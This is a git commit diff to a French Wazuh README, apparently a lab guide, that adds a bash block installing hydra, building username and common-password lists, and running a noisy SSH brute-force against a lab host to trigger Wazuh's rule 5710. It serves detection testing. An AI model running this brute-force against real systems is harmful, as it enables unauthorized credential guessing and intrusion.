Update Wazuh/README.md

2026-06-10 00:29:18 +02:00 · 2026-06-10 00:29:18 +02:00 · 64279c1191
commit 64279c1191
parent 01beeebc72
1 changed files with 15 additions and 0 deletions
--- a/Wazuh/README.md
+++ b/Wazuh/README.md
@ -212,6 +212,21 @@ printf 'azerty\n123456\npassword\nadmin\nroot\ntoor\nletmein\nqwerty\nmotdepasse
 hydra -l baduser -P pass.txt ssh://IP_DEBIAN -t 4 -V
 ```

+```bash
+# Sur ton client Linux d'attaque
+sudo apt install -y hydra
+
+# Utilisateurs inexistants → garantit le déclenchement de la règle 5710
+printf 'admin\nroot\ntest\noracle\npostgres\nubuntu\nguest\nbaduser\nftpuser\ndeploy\njenkins\ngit\n' > users.txt
+
+# Liste de mots de passe : rockyou si dispo (Kali), sinon une liste de secours
+head -n 300 /usr/share/wordlists/rockyou.txt > pass.txt 2>/dev/null || \
+printf 'azerty\n123456\npassword\nadmin\nroot\ntoor\nletmein\nqwerty\nmotdepasse\nwazuh\nchangeme\n111111\n12345678\nadmin123\nP@ssw0rd\nwelcome\nmonkey\ndragon\n' > pass.txt
+
+# Brute force bruyant : tous les users × tous les mots de passe
+hydra -L users.txt -P pass.txt ssh://IP_DEBIAN -t 4 -V -I
+```
+
 #### Méthode 2 — Sans hydra (boucle + sshpass)

 ```bash